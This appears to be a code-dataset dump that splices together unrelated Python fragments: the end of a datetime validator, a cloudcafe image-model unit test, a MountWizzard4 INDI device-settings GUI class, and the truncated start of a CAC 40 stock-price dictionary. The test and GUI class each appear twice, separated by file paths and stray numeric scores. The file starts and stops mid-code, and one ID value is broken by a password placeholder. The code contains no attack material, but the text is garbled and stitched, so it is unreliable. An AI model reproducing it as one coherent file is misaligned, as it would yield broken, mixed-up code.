DateTimeValidator(DateTimeFormat.LOCAL_OR_UTC, local_timezone=tz.gettz('Europe/Berlin'))
# Allow datetime strings with and without timezone (using CET/CEST (+01:00/+02:00) as default), but convert all datetimes to UTC
# "2021-12-31T12:34:56" -> datetime(2021, 12, 31, 11, 34, 56, tzinfo=timezone.utc) (input interpreted as UTC+01:00)
# "2021-12-31T12:34:56Z" -> datetime(2021, 12, 31, 12, 34, 56, tzinfo=timezone.utc) (unchanged because it's already UTC)
# "2021-12-31T12:34:56-06:00" -> datetime(2021, 12, 31, 18, 34, 56, tzinfo=timezone.utc)
DateTimeValidator(local_timezone=tz.gettz('Europe/Berlin'), target_timezone=timezone.utc)
```
Examples for datetime ranges:
```
from validataclass.helpers import DateTimeRange, DateTimeOffsetRange
# Only allow datetimes within a specified datetime range, e.g. allow all datetimes in the year 2021
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeRange(
datetime(2021, 1, 1, 0, 0, 0, tzinfo=timezone.utc),
datetime(2021, 12, 31, 23, 59, 59, 999999, tzinfo=timezone.utc)
))
# Specify a datetime range using a pivot datetime and two offsets (allows all datetimes "around" some datetime plus/minus offsets),
# e.g. all datetimes between pivot_datetime - 5 minutes and pivot_datetime + 10 minutes:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(
pivot=datetime(2021, 5, 25, 12, 0, 0, tzinfo=timezone.utc),
offset_minus=timedelta(minutes=5),
offset_plus=timedelta(minutes=10)
))
# The pivot can also be a callable (which will be evaluated just when the validator is called), or undefined, in which case it
# defaults to the current time (in UTC and without milliseconds), e.g. to only allow all datetimes in the next 2 weeks:
DateTimeValidator(local_timezone=timezone.utc, datetime_range=DateTimeOffsetRange(offset_plus=timedelta(weeks=2)))
```
See also: `DateValidator`, `TimeValidator`
Valid input: Datetime strings in the format specified above as `str`
Output: `datetime.datetime`
"""
# Datetime string format (enum)
datetime_format: DateTimeFormat
# Precompiled regular expression for the specified datetime string format
datetime_format_regex: re.Pattern
# Timezone to use for datetime strings without a specified timezone (None: no default timezone info in datetime)
local_timezone: Optional[tzinfo] = None
# Target timezone that all datetimes will be converted to (None: no timezone conversion)
target_timezone: Optional[tzinfo] = None
# Datetime range that defines which values are allowed
datetime_range: Optional[BaseDateTimeRange] = None
def __init__(
self,
datetime_format: DateTimeFormat = DateTimeFormat.ALLOW_TIMEZONE,
*,
local_timezone: Optional[tzinfo] = None,
target_timezone: Optional[tzinfo] = None,
datetime_range: Optional[BaseDateTimeRange] = None,
):
"""
Create a `DateTimeValidator` with a specified datetime string format, optionally a local timezone, a target timezone and/or
a datetime range.
If a target timezone is specified and a format that allows local datetimes is used (ALLOW_TIMEZONE, LOCAL_ONLY or LOCAL_OR_UTC),
the parameter "local_timezone" is required (otherwise it would be unclear how to interpret and convert local datetimes).
To define datetime ranges using the "datetime_range" parameter, see the classes `DateTimeRange` and `DateTimeOffsetRange` from
`validataclass.helpers.datetime_range`.
Parameters:
datetime_format: `DateTimeFormat`, specifies the accepted string formats (default: `ALLOW_TIMEZONE`)
local_timezone: `tzinfo`, specifies the default timezone to set for datetime strings without timezone info (default: None)
target_timezone: `tzinfo`, if specified, all datetimes will be converted to this timezone (default: None)
datetime_range: `BaseDateTimeRange` (subclasses), specifies the range of allowed values (default: None)
"""
# Initialize StringValidator without any parameters
super().__init__()
# Check parameter validity
if target_timezone is not None and datetime_format.allows_local() and local_timezone is None:
raise InvalidValidatorOptionException('Parameter "local_timezone" is required when a datetime format that allows local '
'datetimes is used and "target_timezone" is specified.')
# Save parameters
self.datetime_format = datetime_format
self.local_timezone = local_timezone
self.target_timezone = target_timezone
self.datetime_range = datetime_range
# Precompile regular expression for datetime format
self.datetime_format_regex = re.compile(self.datetime_format.regex_str)
def validate(self, input_data: Any) -> datetime:
"""
Validate input as a valid datetime string and convert it to a `datetime.datetime` object.
"""
# First, validate input data as string
datetime_string = super().validate(input_data)
# Validate string format with a regular expression
if not self.datetime_format_regex.fullmatch(datetime_string):
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Replace 'Z' suffix to make the string compatible with fromisoformat()
if datetime_string[-1] == 'Z':
datetime_string = datetime_string[:-1] + '+00:00'
# Try to create datetime object from string (accepts a certain subset of ISO 8601 datetime strings)
try:
datetime_obj = datetime.fromisoformat(datetime_string)
except ValueError:
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Set timezone to local_timezone if no timezone is specified
if datetime_obj.tzinfo is None and self.local_timezone is not None:
datetime_obj = datetime_obj.replace(tzinfo=self.local_timezone)
# Check datetime against datetime_range (if defined)
if self.datetime_range is not None and not self.datetime_range.contains_datetime(datetime_obj, self.local_timezone):
# Add extra fields (lower_boundary, upper_boundary) to the validation error
raise DateTimeRangeError(**self.datetime_range.to_dict(self.local_timezone))
# Convert datetime to target timezone (if defined)
if self.target_timezone is not None:
datetime_obj = datetime_obj.astimezone(self.target_timezone)
return datetime_obj | 0.937009 | 0.674456 |
from copy import deepcopy
import dateutil.parser
import json
import os
import unittest
from cloudcafe.images.common.types import (
ImageContainerFormat, ImageDiskFormat, ImageStatus, ImageVisibility)
from cloudcafe.images.v2.models.image import Image
class TestImage(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.raw_image_str = open(os.path.join(
os.path.dirname(__file__), '../data/image.json')).read()
cls.raw_images_str = open(os.path.join(
os.path.dirname(__file__), '../data/images.json')).read()
# Required due to datetime parser in image client
date_time = dateutil.parser.parse(unicode('2013-05-22T14:24:36Z'))
cls.image_obj = Image(
checksum='69c33642f44ca552ba4bb8b66ad97e85',
container_format=ImageContainerFormat.ARI,
created_at=date_time,
disk_format=ImageDiskFormat.ARI,
file_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7/file',
id_='21c697d1-2cc5-4a45-<PASSWORD>',
min_disk=0,
min_ram=0,
name='cirros-0.3.1-x86_64-uec-ramdisk',
protected=False,
schema='/v2/schemas/image',
self_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7',
size=3714968,
status=ImageStatus.ACTIVE,
tags=[],
updated_at=date_time,
visibility=ImageVisibility.PUBLIC,
additional_properties={unicode('additional_properties'): {}})
cls.obj_dict = json.loads(cls.raw_image_str)
def test_positive_equality(self):
assert self.image_obj == deepcopy(self.image_obj)
def test_negative_equality(self):
different_obj = deepcopy(self.image_obj)
different_obj.name = 'cirros-fake'
assert self.image_obj != different_obj
def test_deserialization_from_json(self):
deserialized_obj = Image._json_to_obj(self.raw_image_str)
assert self.image_obj == deserialized_obj
def test_dict_to_obj(self):
assert self.image_obj == Image._dict_to_obj(self.obj_dict)
def test_serialization_to_json(self):
# Required due to datetime parser in image client
setattr(self.image_obj, 'created_at', '2013-05-22T14:24:36Z')
setattr(self.image_obj, 'updated_at', '2013-05-22T14:24:36Z')
serialized_obj = self.image_obj._obj_to_json()
# we do this to overcome the property ordering:
deserialized_obj = Image._json_to_obj(serialized_obj)
assert set(self.image_obj.__dict__) == set(deserialized_obj.__dict__) | metatests/cloudcafe/images/v2_0/models/image_test.py | from copy import deepcopy
import dateutil.parser
import json
import os
import unittest
from cloudcafe.images.common.types import (
ImageContainerFormat, ImageDiskFormat, ImageStatus, ImageVisibility)
from cloudcafe.images.v2.models.image import Image
class TestImage(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.raw_image_str = open(os.path.join(
os.path.dirname(__file__), '../data/image.json')).read()
cls.raw_images_str = open(os.path.join(
os.path.dirname(__file__), '../data/images.json')).read()
# Required due to datetime parser in image client
date_time = dateutil.parser.parse(unicode('2013-05-22T14:24:36Z'))
cls.image_obj = Image(
checksum='69c33642f44ca552ba4bb8b66ad97e85',
container_format=ImageContainerFormat.ARI,
created_at=date_time,
disk_format=ImageDiskFormat.ARI,
file_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7/file',
id_='21c697d1-2cc5-4a45-<PASSWORD>',
min_disk=0,
min_ram=0,
name='cirros-0.3.1-x86_64-uec-ramdisk',
protected=False,
schema='/v2/schemas/image',
self_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7',
size=3714968,
status=ImageStatus.ACTIVE,
tags=[],
updated_at=date_time,
visibility=ImageVisibility.PUBLIC,
additional_properties={unicode('additional_properties'): {}})
cls.obj_dict = json.loads(cls.raw_image_str)
def test_positive_equality(self):
assert self.image_obj == deepcopy(self.image_obj)
def test_negative_equality(self):
different_obj = deepcopy(self.image_obj)
different_obj.name = 'cirros-fake'
assert self.image_obj != different_obj
def test_deserialization_from_json(self):
deserialized_obj = Image._json_to_obj(self.raw_image_str)
assert self.image_obj == deserialized_obj
def test_dict_to_obj(self):
assert self.image_obj == Image._dict_to_obj(self.obj_dict)
def test_serialization_to_json(self):
# Required due to datetime parser in image client
setattr(self.image_obj, 'created_at', '2013-05-22T14:24:36Z')
setattr(self.image_obj, 'updated_at', '2013-05-22T14:24:36Z')
serialized_obj = self.image_obj._obj_to_json()
# we do this to overcome the property ordering:
deserialized_obj = Image._json_to_obj(serialized_obj)
assert set(self.image_obj.__dict__) == set(deserialized_obj.__dict__) | 0.568416 | 0.268213 |
import PyQt5
# local import
from mw4.base.indiClass import IndiClass
class SettIndi(object):
"""
the main window class handles the main menu as well as the show and no show part of
any other window. all necessary processing for functions of that gui will be linked
to this class. therefore window classes will have a threadpool for managing async
processing if needed.
"""
# INDI device types
GENERAL_INTERFACE = 0
TELESCOPE_INTERFACE = (1 << 0)
CCD_INTERFACE = (1 << 1)
GUIDER_INTERFACE = (1 << 2)
FOCUSER_INTERFACE = (1 << 3)
FILTER_INTERFACE = (1 << 4)
DOME_INTERFACE = (1 << 5)
GPS_INTERFACE = (1 << 6)
WEATHER_INTERFACE = (1 << 7)
AO_INTERFACE = (1 << 8)
DUSTCAP_INTERFACE = (1 << 9)
LIGHTBOX_INTERFACE = (1 << 10)
DETECTOR_INTERFACE = (1 << 11)
AUX_INTERFACE = (1 << 15)
def __init__(self):
self.indiClass = None
self.indiDeviceList = list()
self.indiSearchType = None
self.indiDevices = {
'dome':
{'uiName': self.ui.domeDeviceName,
'uiDevice': self.ui.domeDevice,
'uiSearch': self.ui.searchDomeDevices,
'searchType': self.DOME_INTERFACE,
'uiMessage': self.ui.domeDeviceMessage,
'class': self.app.dome,
'dispatch': self.domeDispatch,
'signals': self.app.dome.client.signals,
'port': self.ui.domePort,
'host': self.ui.domeHost,
},
'imaging':
{'uiName': self.ui.imagingDeviceName,
'uiDevice': self.ui.imagingDevice,
'uiSearch': self.ui.searchImagingDevices,
'searchType': self.CCD_INTERFACE,
'uiMessage': self.ui.imagingDeviceMessage,
'class': self.app.imaging,
'dispatch': self.imagingDispatch,
'signals': self.app.imaging.client.signals,
'port': self.ui.imagingPort,
'host': self.ui.imagingHost,
},
'sensorWeather':
{'uiName': self.ui.sensorWeatherDeviceName,
'uiDevice': self.ui.sensorWeatherDevice,
'uiSearch': self.ui.searchSensorWeatherDevices,
'searchType': self.WEATHER_INTERFACE,
'uiMessage': self.ui.sensorWeatherDeviceMessage,
'class': self.app.sensorWeather,
'dispatch': self.sensorWeatherDispatch,
'signals': self.app.sensorWeather.client.signals,
'port': self.ui.sensorWeatherPort,
'host': self.ui.sensorWeatherHost,
},
'cover':
{'uiName': self.ui.coverDeviceName,
'uiDevice': self.ui.coverDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.coverDeviceMessage,
'class': self.app.cover,
'dispatch': self.coverDispatch,
'signals': self.app.cover.client.signals,
'port': self.ui.coverPort,
'host': self.ui.coverHost,
},
'skymeter':
{'uiName': self.ui.skymeterDeviceName,
'uiDevice': self.ui.skymeterDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.skymeterDeviceMessage,
'class': self.app.skymeter,
'dispatch': self.skymeterDispatch,
'signals': self.app.skymeter.client.signals,
'port': self.ui.skymeterPort,
'host': self.ui.skymeterHost,
},
'telescope':
{'uiName': self.ui.telescopeDeviceName,
'uiDevice': self.ui.telescopeDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.telescopeDeviceMessage,
'class': self.app.telescope,
'dispatch': self.telescopeDispatch,
'signals': self.app.telescope.client.signals,
'port': self.ui.telescopePort,
'host': self.ui.telescopeHost,
},
'power':
{'uiName': self.ui.powerDeviceName,
'uiDevice': self.ui.powerDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.powerDeviceMessage,
'class': self.app.power,
'dispatch': self.powerDispatch,
'signals': self.app.power.client.signals,
'port': self.ui.powerPort,
'host': self.ui.powerHost,
},
}
# signals from functions
for name, item in self.indiDevices.items():
item['uiName'].currentIndexChanged.connect(item['dispatch'])
item['host'].editingFinished.connect(self.shareServer)
item['port'].editingFinished.connect(self.shareServer)
if item['uiSearch'] is not None:
item['uiSearch'].clicked.connect(self.searchDevices)
item['uiMessage'].clicked.connect(self.shareMessage)
item['signals'].serverDisconnected.connect(self.showIndiDisconnected)
item['signals'].deviceConnected.connect(self.showDeviceConnected)
item['signals'].deviceDisconnected.connect(self.showDeviceDisconnected)
self.setupDeviceNameGui()
def initConfig(self):
"""
initConfig read the key out of the configuration dict and stores it to the gui
elements. if some initialisations have to be proceeded with the loaded persistent
data, they will be launched as well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
uiList = self.indiDevices[device]['uiName']
deviceList = config.get(f'{device}Devices', [])
for deviceItem in deviceList:
if deviceItem == 'No device driver selected':
continue
uiList.addItem(deviceItem)
for name, item in self.indiDevices.items():
self.indiDevices[name]['uiName'].setCurrentIndex(config.get(f'{name}Name', 0))
self.indiDevices[name]['uiMessage'].setChecked(config.get(f'{name}Message', False))
self.indiDevices[name]['port'].setText(config.get(f'{name}Port', '7624'))
self.indiDevices[name]['host'].setText(config.get(f'{name}Host', ''))
self.ui.shareIndiServer.setChecked(config.get('shareIndiServer', True))
self.shareServer()
self.shareMessage()
return True
def storeConfig(self):
"""
storeConfig writes the keys to the configuration dict and stores. if some
saving has to be proceeded to persistent data, they will be launched as
well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
model = self.indiDevices[device]['uiName'].model()
deviceList = []
for index in range(model.rowCount()):
if model.item(index).text() == 'No device driver selected':
continue
deviceList.append(model.item(index).text())
config[f'{device}Devices'] = deviceList
for name, item in self.indiDevices.items():
config[f'{name}Name'] = self.indiDevices[name]['uiName'].currentIndex()
config[f'{name}Message'] = self.indiDevices[name]['uiMessage'].isChecked()
config[f'{name}Port'] = self.indiDevices[name]['port'].text()
config[f'{name}Host'] = self.indiDevices[name]['host'].text()
config['shareIndiServer'] = self.ui.shareIndiServer.isChecked()
return True
def setupDeviceNameGui(self):
"""
setupRelayGui handles the dropdown lists for all devices possible in mountwizzard.
therefore we add the necessary entries to populate the list.
:return: success for test
"""
dropDowns = list(self.indiDevices[device]['uiName'] for device in self.indiDevices)
for dropDown in dropDowns:
dropDown.clear()
dropDown.setView(PyQt5.QtWidgets.QListView())
dropDown.addItem('No device driver selected')
self.indiDevices['skymeter']['uiName'].addItem('SQM')
self.indiDevices['telescope']['uiName'].addItem('LX200 10micron')
self.indiDevices['power']['uiName'].addItem('Pegasus UPB')
self.indiDevices['cover']['uiName'].addItem('Flip Flat')
return True
def shareServer(self):
"""
shareServer is called whenever a indi server host is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return:
"""
ports = list(self.indiDevices[device]['port'] for device in self.indiDevices)
hosts = list(self.indiDevices[device]['host'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, host, port in zip(baseClasses, hosts, ports):
if self.ui.shareIndiServer.isChecked():
if self.sender() != host and self.sender() in hosts:
host.setText(self.sender().text())
if self.sender() != port and self.sender() in ports:
port.setText(self.sender().text())
baseClass.client.host = (host.text(), int(port.text()))
return True
def shareMessage(self):
"""
shareMessage is called whenever a indi message checkbox is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return: true for test purpose
"""
messages = list(self.indiDevices[device]['uiMessage'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, message in zip(baseClasses, messages):
if self.ui.shareIndiServer.isChecked():
if self.sender() != message and self.sender() in messages:
message.setChecked(self.sender().isChecked())
baseClass.showMessages = message.isChecked()
return True
def showIndiDisconnected(self, deviceList):
"""
showIndiDisconnected writes info to message window and recolors the status
:return: true for test purpose
"""
if not deviceList:
return False
deviceName = list(deviceList.keys())[0]
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
return True
def showDeviceConnected(self, deviceName):
"""
showCoverDeviceConnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_GREEN)
self.deviceStat[device] = True
return True
def showDeviceDisconnected(self, deviceName):
"""
showCoverDeviceDisconnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
self.deviceStat[device] = False
return True
def searchDevices(self):
"""
searchDevices implements a search for devices of a certain device type. it is called
from a button press and checks which button it was. after that for the right device
it collects all necessary data for host value, instantiates an INDI client and
watches for all devices connected to this server. Than it connects a subroutine for
collecting the right device names and opens a model dialog. the data collection
takes place as long as the model dialog is open. when the user closes this dialog, the
collected data is written to the drop down list.
:return: true for test purpose
"""
self.indiDeviceList = list()
for device in self.indiDevices:
# simplify
devObj = self.indiDevices[device]
if devObj['uiSearch'] != self.sender():
continue
host = (devObj['host'].text(),
int(devObj['port'].text()),
)
self.indiClass = IndiClass(host=host)
self.indiSearchType = devObj['searchType']
self.indiClass.client.signals.defText.connect(self.addDevicesWithType)
self.indiClass.client.connectServer()
self.indiClass.client.watchDevice()
msg = PyQt5.QtWidgets.QMessageBox
msg.critical(self,
'Searching Devices',
f'Search for {device} could take some seconds!')
self.indiClass.client.disconnectServer()
self.indiClass = None
self.indiSearchType = None
devObj['uiName'].clear()
devObj['uiName'].setView(PyQt5.QtWidgets.QListView())
devObj['uiName'].addItem('No device driver selected')
for deviceName in self.indiDeviceList:
devObj['uiName'].addItem(deviceName)
return True
def addDevicesWithType(self, deviceName, propertyName):
"""
addDevicesWithType gety called whenever a new device send out text messages. than it
checks, if the device type fits to the search type desired. if they match, the
device name is added to the list.
:param deviceName:
:param propertyName:
:return: success
"""
device = self.indiClass.client.devices[deviceName]
interface = device.getText(propertyName).get('DRIVER_INTERFACE', None)
if interface is None:
return False
if self.indiSearchType is None:
return False
interface = int(interface)
if interface & self.indiSearchType:
self.indiDeviceList.append(deviceName)
return True | mw4/gui/mainWmixin/tabSettIndi.py | import PyQt5
# local import
from mw4.base.indiClass import IndiClass
class SettIndi(object):
"""
the main window class handles the main menu as well as the show and no show part of
any other window. all necessary processing for functions of that gui will be linked
to this class. therefore window classes will have a threadpool for managing async
processing if needed.
"""
# INDI device types
GENERAL_INTERFACE = 0
TELESCOPE_INTERFACE = (1 << 0)
CCD_INTERFACE = (1 << 1)
GUIDER_INTERFACE = (1 << 2)
FOCUSER_INTERFACE = (1 << 3)
FILTER_INTERFACE = (1 << 4)
DOME_INTERFACE = (1 << 5)
GPS_INTERFACE = (1 << 6)
WEATHER_INTERFACE = (1 << 7)
AO_INTERFACE = (1 << 8)
DUSTCAP_INTERFACE = (1 << 9)
LIGHTBOX_INTERFACE = (1 << 10)
DETECTOR_INTERFACE = (1 << 11)
AUX_INTERFACE = (1 << 15)
def __init__(self):
self.indiClass = None
self.indiDeviceList = list()
self.indiSearchType = None
self.indiDevices = {
'dome':
{'uiName': self.ui.domeDeviceName,
'uiDevice': self.ui.domeDevice,
'uiSearch': self.ui.searchDomeDevices,
'searchType': self.DOME_INTERFACE,
'uiMessage': self.ui.domeDeviceMessage,
'class': self.app.dome,
'dispatch': self.domeDispatch,
'signals': self.app.dome.client.signals,
'port': self.ui.domePort,
'host': self.ui.domeHost,
},
'imaging':
{'uiName': self.ui.imagingDeviceName,
'uiDevice': self.ui.imagingDevice,
'uiSearch': self.ui.searchImagingDevices,
'searchType': self.CCD_INTERFACE,
'uiMessage': self.ui.imagingDeviceMessage,
'class': self.app.imaging,
'dispatch': self.imagingDispatch,
'signals': self.app.imaging.client.signals,
'port': self.ui.imagingPort,
'host': self.ui.imagingHost,
},
'sensorWeather':
{'uiName': self.ui.sensorWeatherDeviceName,
'uiDevice': self.ui.sensorWeatherDevice,
'uiSearch': self.ui.searchSensorWeatherDevices,
'searchType': self.WEATHER_INTERFACE,
'uiMessage': self.ui.sensorWeatherDeviceMessage,
'class': self.app.sensorWeather,
'dispatch': self.sensorWeatherDispatch,
'signals': self.app.sensorWeather.client.signals,
'port': self.ui.sensorWeatherPort,
'host': self.ui.sensorWeatherHost,
},
'cover':
{'uiName': self.ui.coverDeviceName,
'uiDevice': self.ui.coverDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.coverDeviceMessage,
'class': self.app.cover,
'dispatch': self.coverDispatch,
'signals': self.app.cover.client.signals,
'port': self.ui.coverPort,
'host': self.ui.coverHost,
},
'skymeter':
{'uiName': self.ui.skymeterDeviceName,
'uiDevice': self.ui.skymeterDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.skymeterDeviceMessage,
'class': self.app.skymeter,
'dispatch': self.skymeterDispatch,
'signals': self.app.skymeter.client.signals,
'port': self.ui.skymeterPort,
'host': self.ui.skymeterHost,
},
'telescope':
{'uiName': self.ui.telescopeDeviceName,
'uiDevice': self.ui.telescopeDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.telescopeDeviceMessage,
'class': self.app.telescope,
'dispatch': self.telescopeDispatch,
'signals': self.app.telescope.client.signals,
'port': self.ui.telescopePort,
'host': self.ui.telescopeHost,
},
'power':
{'uiName': self.ui.powerDeviceName,
'uiDevice': self.ui.powerDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.powerDeviceMessage,
'class': self.app.power,
'dispatch': self.powerDispatch,
'signals': self.app.power.client.signals,
'port': self.ui.powerPort,
'host': self.ui.powerHost,
},
}
# signals from functions
for name, item in self.indiDevices.items():
item['uiName'].currentIndexChanged.connect(item['dispatch'])
item['host'].editingFinished.connect(self.shareServer)
item['port'].editingFinished.connect(self.shareServer)
if item['uiSearch'] is not None:
item['uiSearch'].clicked.connect(self.searchDevices)
item['uiMessage'].clicked.connect(self.shareMessage)
item['signals'].serverDisconnected.connect(self.showIndiDisconnected)
item['signals'].deviceConnected.connect(self.showDeviceConnected)
item['signals'].deviceDisconnected.connect(self.showDeviceDisconnected)
self.setupDeviceNameGui()
def initConfig(self):
"""
initConfig read the key out of the configuration dict and stores it to the gui
elements. if some initialisations have to be proceeded with the loaded persistent
data, they will be launched as well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
uiList = self.indiDevices[device]['uiName']
deviceList = config.get(f'{device}Devices', [])
for deviceItem in deviceList:
if deviceItem == 'No device driver selected':
continue
uiList.addItem(deviceItem)
for name, item in self.indiDevices.items():
self.indiDevices[name]['uiName'].setCurrentIndex(config.get(f'{name}Name', 0))
self.indiDevices[name]['uiMessage'].setChecked(config.get(f'{name}Message', False))
self.indiDevices[name]['port'].setText(config.get(f'{name}Port', '7624'))
self.indiDevices[name]['host'].setText(config.get(f'{name}Host', ''))
self.ui.shareIndiServer.setChecked(config.get('shareIndiServer', True))
self.shareServer()
self.shareMessage()
return True
def storeConfig(self):
"""
storeConfig writes the keys to the configuration dict and stores. if some
saving has to be proceeded to persistent data, they will be launched as
well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
model = self.indiDevices[device]['uiName'].model()
deviceList = []
for index in range(model.rowCount()):
if model.item(index).text() == 'No device driver selected':
continue
deviceList.append(model.item(index).text())
config[f'{device}Devices'] = deviceList
for name, item in self.indiDevices.items():
config[f'{name}Name'] = self.indiDevices[name]['uiName'].currentIndex()
config[f'{name}Message'] = self.indiDevices[name]['uiMessage'].isChecked()
config[f'{name}Port'] = self.indiDevices[name]['port'].text()
config[f'{name}Host'] = self.indiDevices[name]['host'].text()
config['shareIndiServer'] = self.ui.shareIndiServer.isChecked()
return True
def setupDeviceNameGui(self):
"""
setupRelayGui handles the dropdown lists for all devices possible in mountwizzard.
therefore we add the necessary entries to populate the list.
:return: success for test
"""
dropDowns = list(self.indiDevices[device]['uiName'] for device in self.indiDevices)
for dropDown in dropDowns:
dropDown.clear()
dropDown.setView(PyQt5.QtWidgets.QListView())
dropDown.addItem('No device driver selected')
self.indiDevices['skymeter']['uiName'].addItem('SQM')
self.indiDevices['telescope']['uiName'].addItem('LX200 10micron')
self.indiDevices['power']['uiName'].addItem('Pegasus UPB')
self.indiDevices['cover']['uiName'].addItem('Flip Flat')
return True
def shareServer(self):
"""
shareServer is called whenever a indi server host is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return:
"""
ports = list(self.indiDevices[device]['port'] for device in self.indiDevices)
hosts = list(self.indiDevices[device]['host'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, host, port in zip(baseClasses, hosts, ports):
if self.ui.shareIndiServer.isChecked():
if self.sender() != host and self.sender() in hosts:
host.setText(self.sender().text())
if self.sender() != port and self.sender() in ports:
port.setText(self.sender().text())
baseClass.client.host = (host.text(), int(port.text()))
return True
def shareMessage(self):
"""
shareMessage is called whenever a indi message checkbox is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return: true for test purpose
"""
messages = list(self.indiDevices[device]['uiMessage'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, message in zip(baseClasses, messages):
if self.ui.shareIndiServer.isChecked():
if self.sender() != message and self.sender() in messages:
message.setChecked(self.sender().isChecked())
baseClass.showMessages = message.isChecked()
return True
def showIndiDisconnected(self, deviceList):
"""
showIndiDisconnected writes info to message window and recolors the status
:return: true for test purpose
"""
if not deviceList:
return False
deviceName = list(deviceList.keys())[0]
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
return True
def showDeviceConnected(self, deviceName):
"""
showCoverDeviceConnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_GREEN)
self.deviceStat[device] = True
return True
def showDeviceDisconnected(self, deviceName):
"""
showCoverDeviceDisconnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
self.deviceStat[device] = False
return True
def searchDevices(self):
"""
searchDevices implements a search for devices of a certain device type. it is called
from a button press and checks which button it was. after that for the right device
it collects all necessary data for host value, instantiates an INDI client and
watches for all devices connected to this server. Than it connects a subroutine for
collecting the right device names and opens a model dialog. the data collection
takes place as long as the model dialog is open. when the user closes this dialog, the
collected data is written to the drop down list.
:return: true for test purpose
"""
self.indiDeviceList = list()
for device in self.indiDevices:
# simplify
devObj = self.indiDevices[device]
if devObj['uiSearch'] != self.sender():
continue
host = (devObj['host'].text(),
int(devObj['port'].text()),
)
self.indiClass = IndiClass(host=host)
self.indiSearchType = devObj['searchType']
self.indiClass.client.signals.defText.connect(self.addDevicesWithType)
self.indiClass.client.connectServer()
self.indiClass.client.watchDevice()
msg = PyQt5.QtWidgets.QMessageBox
msg.critical(self,
'Searching Devices',
f'Search for {device} could take some seconds!')
self.indiClass.client.disconnectServer()
self.indiClass = None
self.indiSearchType = None
devObj['uiName'].clear()
devObj['uiName'].setView(PyQt5.QtWidgets.QListView())
devObj['uiName'].addItem('No device driver selected')
for deviceName in self.indiDeviceList:
devObj['uiName'].addItem(deviceName)
return True
def addDevicesWithType(self, deviceName, propertyName):
"""
addDevicesWithType gety called whenever a new device send out text messages. than it
checks, if the device type fits to the search type desired. if they match, the
device name is added to the list.
:param deviceName:
:param propertyName:
:return: success
"""
device = self.indiClass.client.devices[deviceName]
interface = device.getText(propertyName).get('DRIVER_INTERFACE', None)
if interface is None:
return False
if self.indiSearchType is None:
return False
interface = int(interface)
if interface & self.indiSearchType:
self.indiDeviceList.append(deviceName)
return True | 0.383757 | 0.175821 |
date = '16/03/2020'
data = {
'LVMH': [298, 150e9, 'Consumer goods'] ,
'L\'OREAL': [208, 116e9, 'Consumer goods'],
'SANOFI' : [77.0, 96.0e9, 'Health care'],
'AIRBUS' : [69, 54.0e9, 'Industrials'],
'TOTAL' : [24.3, 63.3e9, 'Oil and gas'],
'HERMES' : [548, 57.9e9, 'Consumer goods'],
'KERING' : [378, 47.7e9, 'Consumer services'],
'AIR LIQUIDE' : [99.2, 47.0e9, 'Basic materials'],
'BNP PARIBAS' : [27.4, 34.3e9, 'Financials'],
'VINCI' : [59.0, 35.8e9, 'Industrials'],
'ESSILORLUXOTTICA' : [96.0, 41.9e9, 'Health care'],
'SCHNEIDER ELECTRIC' : [70.4, 41.0e9, 'Industrials'],
'AXA' : [13.4, 32.5e9, 'Financials'],
'SAFRAN' : [74.5, 29.9e9, 'Industrials'],
